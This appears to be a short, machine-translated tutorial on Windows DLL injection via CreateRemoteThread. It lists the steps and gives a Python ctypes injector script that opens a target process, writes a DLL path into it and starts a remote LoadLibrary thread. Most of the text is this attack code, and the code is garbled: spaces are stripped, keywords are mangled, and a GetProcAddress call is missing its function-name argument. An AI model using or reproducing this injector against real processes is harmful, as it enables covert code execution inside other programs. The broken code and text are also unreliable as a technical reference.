Dynamic Library injection-remote threading

• Nowadays, it is very rare to use remote threading to inject dynamic libraries or shellcode, which is commonly used as an injection method to learn.
• Implementation process

  A process handle is obtained based on the process ID.

  b Get the address of the LoadLibrary () function in Kernel32.dll.

  C requests memory in the target process and writes the address of the dynamic library (as a parameter to the LoadLibrary function).

  D call CreateRemoteThread () to create a remote thread.

  CreateRemoteThread (Processhandle,none,0, loadlibraryaddr,dll_path_addr,0, ByRef (thread_id))

• Code implementation

  #-*-coding:utf-8-*- fromcTYPESImport*ImportcTYPESImportOSImportPsutilImportReImportSYSdefInjectdll (Pid,dll_path): Page_rw_priv= 0x04process_all_access= (0x000f0000 | 0x00100000 | 0xFFF) Virtual_mem= (0x1000 | 0x2000) kernel32=Windll.kernel32Print("[+] starting DLL Injector") Dlllength=Len (Dll_path)Print("[+] Getting Process Handle from ProcessId%d", PID)#Open Process handleProcessHandle =KERNEL32. OpenProcess (process_all_access,false,pid)ifProcessHandle = =None:Print("Unable to Get Process Handle") sys.exit (0)Print("In targetprocess Alloc Buffer Space")    #request memory in each other's virtual memory address to store the DLL's addressDLL_PATH_ADDR =KERNEL32. VirtualAllocEx (processhandle, 0, DLL    Length, Virtual_mem, Page_rw_priv) Bool_write=c_int (0)Print("Writing Dll Path to Target Process Space")    #writes the address of the dynamic library to the target processKERNEL32.                              WriteProcessMemory (ProcessHandle, dll_path_addr, Dll_path, Dlllength, ByRef (bool_write))#get the address of the Kernel32.dll module    Print("\t[+] Resolving call spacific function & Librarise") Kernel32dllhandle= Kernel32. Getmodulehandlea ("Kernel32.dll")    #get LoadLibrary function addressLOADLIBRARYADDR =KERNEL32. GetProcAddress (kernel32dllhandle) thread_id=c_ulong (0) Threadhandle=KERNEL32.                                              CreateRemoteThread (ProcessHandle, None, 0, Loadlibraryaddr, Dll_ Path_addr, 0,byref (thread_id))if  notThreadhandle:Print("Injection Failed exiting") sys.exit (0)Else:        Print("Remote Thread Id%d", thread_id)if __name__=="__main__": PID= Input ("Enter the process ID") Target=[] I=0#determine the computer version    ifSTR (ctypes.sizeof (CTYPES.C_VOIDP)) = ='4':        Print("runing on a X86 machine seleteing DLL") Dll_path= Os.path.abspath ("Vminjector32.dll")    Else:        Print("Running on a x64 machine selecting DLL") Dll_path= Os.path.abspath ("Vminjector64.dll")    Print('configured DLL path to%s \ n'%Dll_path) Injectdll (Pid,dll_path)

Dynamic Library injection-remote threading